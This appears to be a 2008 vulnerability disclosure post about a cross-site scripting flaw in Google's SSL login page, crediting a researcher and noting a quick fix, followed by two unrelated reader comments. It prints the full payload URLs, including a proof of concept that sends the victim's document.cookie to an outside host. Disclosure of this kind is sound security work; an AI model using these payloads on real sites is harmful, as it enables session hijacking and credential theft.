Google accounts SSL login page suffers from highly critical XSS
Nov 13, 2008 | Category: Google Vulns
In this case, the fact that SSL is being used on the login page, does not necessarily mean that the users’ login information is secured. UPDATE: this was fixed a few hours after publishing it.
Malicious people can exploit this Google XSS to propagate malware, spyware, adware and steal authentication credentials.
Mirror:
http://www.xssed.com/mirror/54247/
XSS:
https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e%27%22%3E%3C/title%3E%3Cscript%3Ealert(1337)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20Xylitol%3C/h1%3E%3C/marquee%3En&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=services&utm_medium=redirect&utm_campaign=standalone
Redirection and document.cookie PoC:
https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e’”><SCRIPT>location.href+%3D+’http%3A%2F%2Fwww.xssed.com/?’%2Bdocument.cookie<%2FSCRIPT>&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=services&utm_medium=redirect&utm_campaign=standalone
Mirror of similar old Google XSS (now fixed):
http://www.xssed.com/mirror/25472/
Security researcher “Xylitol” is credited with the discovery of this critical bug.
It is only a matter of minutes before we see it fixed by Google.
February 2nd, 2013 at 9:37 am
I don’t know if it’s just me or if perhaps everybody else encountering problems with your site.
It appears as though some of the text on your content are running off the screen.
Can someone else please comment and let me know if
this is happening to them as well? This may be
a problem with my browser because I’ve had this happen previously. Thank you
April 17th, 2013 at 4:29 am
An interesting discussion is worth comment. I do believe that you should write more about this subject, it might not be a taboo matter but usually folks don’t discuss these subjects. To the next! Kind regards!!